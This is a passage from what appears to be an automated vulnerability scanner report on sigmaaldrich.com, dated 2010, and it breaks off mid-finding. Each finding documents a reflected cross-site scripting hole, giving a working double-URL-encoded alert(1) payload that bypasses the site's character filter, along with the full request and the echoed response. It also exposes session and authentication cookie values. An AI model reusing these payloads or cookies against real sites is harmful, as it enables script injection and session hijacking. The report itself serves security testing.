Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:33 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich3c0fa";alert(1)//12241bca07a/splash-hex","E404") ;
   </script>
...[SNIP]...

1.496. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/splash-hex [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/splash-hex

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c46%2522%253balert%25281%2529%252f%252fc83f6df0c1c was submitted in the REST URL parameter 4. This input was echoed as c7c46";alert(1)//c83f6df0c1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/splash-hexc7c46%2522%253balert%25281%2529%252f%252fc83f6df0c1c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/splash-hexc7c46";alert(1)//c83f6df0c1c","E404") ;
   </script>
...[SNIP]...

1.497. http://www.sigmaaldrich.com/foresee/foresee-trigger.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /foresee/foresee-trigger.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf8a0%2522%253balert%25281%2529%252f%252f19e528ea9f0 was submitted in the REST URL parameter 1. This input was echoed as cf8a0";alert(1)//19e528ea9f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /foreseecf8a0%2522%253balert%25281%2529%252f%252f19e528ea9f0/foresee-trigger.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:07 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28930


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/foreseecf8a0";alert(1)//19e528ea9f0/foresee-trigger.js","E404") ;
   </script>
...[SNIP]...

1.498. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/SAcommon.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc18%2522%253balert%25281%2529%252f%252fbc02b169d87 was submitted in the REST URL parameter 1. This input was echoed as abc18";alert(1)//bc02b169d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsabc18%2522%253balert%25281%2529%252f%252fbc02b169d87/SAcommon.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsabc18";alert(1)//bc02b169d87/SAcommon.js","E404") ;
   </script>
...[SNIP]...

1.499. http://www.sigmaaldrich.com/js/SAcommon.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/SAcommon.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1256%2522%253balert%25281%2529%252f%252fa5b61cfabf7 was submitted in the REST URL parameter 2. This input was echoed as f1256";alert(1)//a5b61cfabf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/SAcommon.jsf1256%2522%253balert%25281%2529%252f%252fa5b61cfabf7 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/SAcommon.jsf1256";alert(1)//a5b61cfabf7","E404") ;
   </script>
...[SNIP]...

1.500. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cartlinks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 590cf%2522%253balert%25281%2529%252f%252f4bb73ab02d2 was submitted in the REST URL parameter 1. This input was echoed as 590cf";alert(1)//4bb73ab02d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js590cf%2522%253balert%25281%2529%252f%252f4bb73ab02d2/cartlinks.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28919


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js590cf";alert(1)//4bb73ab02d2/cartlinks.js","E404") ;
   </script>
...[SNIP]...

1.501. http://www.sigmaaldrich.com/js/cartlinks.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cartlinks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8dd0%2522%253balert%25281%2529%252f%252f3856b28f0c4 was submitted in the REST URL parameter 2. This input was echoed as a8dd0";alert(1)//3856b28f0c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/cartlinks.jsa8dd0%2522%253balert%25281%2529%252f%252f3856b28f0c4 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28919


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/cartlinks.jsa8dd0";alert(1)//3856b28f0c4","E404") ;
   </script>
...[SNIP]...

1.502. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cmdatatagutils.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e152%2522%253balert%25281%2529%252f%252f1b874369945 was submitted in the REST URL parameter 1. This input was echoed as 4e152";alert(1)//1b874369945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js4e152%2522%253balert%25281%2529%252f%252f1b874369945/cmdatatagutils.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=af411ba5-497d-994f-8fee-76093b9e4ac6;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js4e152";alert(1)//1b874369945/cmdatatagutils.js","E404") ;
   </script>
...[SNIP]...

1.503. http://www.sigmaaldrich.com/js/cmdatatagutils.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/cmdatatagutils.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a29%2522%253balert%25281%2529%252f%252f6e9bf014190 was submitted in the REST URL parameter 2. This input was echoed as d2a29";alert(1)//6e9bf014190 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/cmdatatagutils.jsd2a29%2522%253balert%25281%2529%252f%252f6e9bf014190 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=979fe58a-1fe9-6241-8157-6aa5b4ffb473;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/cmdatatagutils.jsd2a29";alert(1)//6e9bf014190","E404") ;
   </script>
...[SNIP]...

1.504. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/controls.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d427d%2522%253balert%25281%2529%252f%252fafb0e2c2678 was submitted in the REST URL parameter 1. This input was echoed as d427d";alert(1)//afb0e2c2678 in the application's response.

